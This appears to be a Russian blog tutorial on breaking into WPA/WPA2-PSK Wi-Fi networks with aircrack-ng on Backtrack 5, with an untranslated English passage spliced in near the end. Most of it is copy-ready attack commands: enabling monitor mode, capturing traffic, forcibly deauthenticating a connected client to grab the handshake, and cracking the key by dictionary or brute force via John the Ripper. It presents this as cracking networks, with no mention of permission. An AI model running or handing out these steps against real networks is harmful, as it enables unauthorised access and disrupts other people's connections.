Взлом wifi (WPA/WPA2-PSK).

Взлом wifi (WPA/WPA2-PSK).

Взлом wifi (WPA/WPA2)
Все действия происходят в операционной системе Backtrack 5, и они аналогичны для других операционных семейства Linux, после установки необходимых пакетов:

sudo apt-get install aircrack-ng

Если не помогло тогда:

wget http://download.aircrack-ng.org/aircrack-ng-1.1.tar.gz
tar -zxvf aircrack-ng-1.1.tar.gz
cd aircrack-ng-1.1
make
make install

Для запуска GUI (Рабочего стола) Backtrack пишем:

startx

Этапы взлома :

    • Переводим интерфейс в «monitor mode»
    • Находим сети защищенные с помощью WPA2 и Pre Shared Key
    • Захватываем все пакеты
    • Деавторизуем клиента, для захвата начального обмена пакетами.
    • Взламываем ключ используя словари.

Для начала узнаем имя нашей wifi карты и переведем ее в режим «monitor mode» :

ifconfig wlan

В нашем случае имя адаптера в системе – wlan0

переводим в режим мониторинга

airmon-ng start wlan0

ifconfig wlan airmon-ng
Сделано, и теперь мы можем использовать карту как mon0
Теперь сканим доступные беспроводные сети, использующие WPA2 / PSK :

airodump-ng mon0

Остановите airodump-ng и запустите его заново, записывая все пакеты на рабочий стол в файл WPA

airodump-ng mon0 --channel 6 --bssid 00:25:86:25:9b:2c -w /root/Desktop/WPA

airodump-ng -w
В данный момент мы имеем два варианта развития событий: либо ждем пока клиент совершит подключение и произойдет процедура авторизации, либо деавторизуем подключенного клиента и тем самым заставим его переподключиться. Время – деньги, поэтому давайте проведем небольшой акт насилия. Нам необходимы bssid точки доступа (-a) и mac адрес подключенного клиента (-c)

aireplay-ng -0 1 -a 00:25:86:25:9b:2c -c 00:1F:33:06:5C:CC mon0

В результате airodump-ng должен показать “WPA Handshake:” в правом верхнем углу:
WPA Handshake
Остановите airodump-ng и убедитесь что все необходимые файлы созданы
cap pacet fies aircrack
С этого момента вам не нужно быть где то неподалеку от точки доступа. Весь взлом будет происходить оффлайн, поэтому вы можете остановить airodump и другие процессы. В действительности, вы можете запустить процесс взлома и идти спать, гулять и прочее… Взлом WPA2 PSK базируется на брутфорсе, и может занять длительное время. Существует два пути взлома: первый довольно быстрый, но не гарантирует успеха, а второй довольно медленный, но гарантирует что рано или поздно вы найдете ключ.
Это атака по словарю и брутфорс. В режиме атаки по словарю программа берёт предполагаемые пароли из указанного файла и сверяет их хеш с атакуемым хешем. В режиме брутфорса программа перебирает все возможные комбинации пароля.
Список словарей для брутфорса можете найти здесь, а также большое количество словарей вы можете найти в интернете, или сгенерировать его самостоятельно используя утилиты, подобные John The Ripper. Как только словарь создан, поместите его на рабочий стол и можете запустить aircrack-ng с данным словарем и файлом .cap, который содержитWPA2 Handshake. Dictionary.dic – имя и формат вашего словаря.

aircrack-ng -w /root/Desktop/Dictionary.dic -b 00:25:86:25:9b:2c /root/Desktop/WPA*.cap

Пошел процесс перебора… и в итоге при наличии подходящего ключа в нашем списке вы получите вот такую картину,собственно пароль после строки KEY FOUND! [пароль]
aircrack key found
Успешность взлома напрямую зависит от сложности пароля. Другими словами, вам может повезти и вы найдете ключ сразу, или не найдете его совсем.
Для взлома с помощью брутфорса мы будем использовать программу John The Ripper, но об этом уже в статье ««John the Ripper поможет проверить надежность вашего пароля в Linux»
The success of cracking the WPA2 PSK key is directly linked to the strength of your password file. In other words, you may get lucky and get the key very fast, or you may not get the key at all.
The second method (bruteforcing) will be successfull for sure, but it may take ages to complete. Keep in mind, a WPA2 key can be up to 64 characters, so in theory you would to build every password combination with all possible character sets and feed them into aircrack. If you want to use John The Ripper to create all possible password combinations and feed them into aircrack-ng, this is the command to use :

john --stdout --incremental:all | aircrack-ng -b 00:19:5B:52:AD:F7 -w - /tmp/wpa2*.cap

(Note : the PSK in my testlab is only 8 characters, contains one uppercase character and 4 numbers). I will post the output when the key was cracked, including the time it required to crack the key.
That’s it

Читайте также  Восстановление прошивки Sansa e200

Взлом wifi (WEP). В этой статье мы с вами рассмотрим как можно с помощью aircrack-ng заполучить ключ от wi-fi. Пример был рассмотрен на Backtrack5. Итак приступим, ...
Узнать пароль от сети легко.... Достаточно знать английский и понимать принцип ее защиты.
Смена mac адреса в Ubuntu, Backtrack. Действия для Ubuntu и Backtrack идентичны, разница только в том что в Ubuntu перед каждой коммандой необходимо прописывать sudo (Команда sudo предоста...
Принцип взлома wifi. Метод поиска и расшифровки хе... Поиск и выбор wifi точки Перехват и запись всех данных посылаемых wifi точкой доступа Принудительно отключаем клиента или ждем пока он переподключ...

Сохрани, чтобы не потерять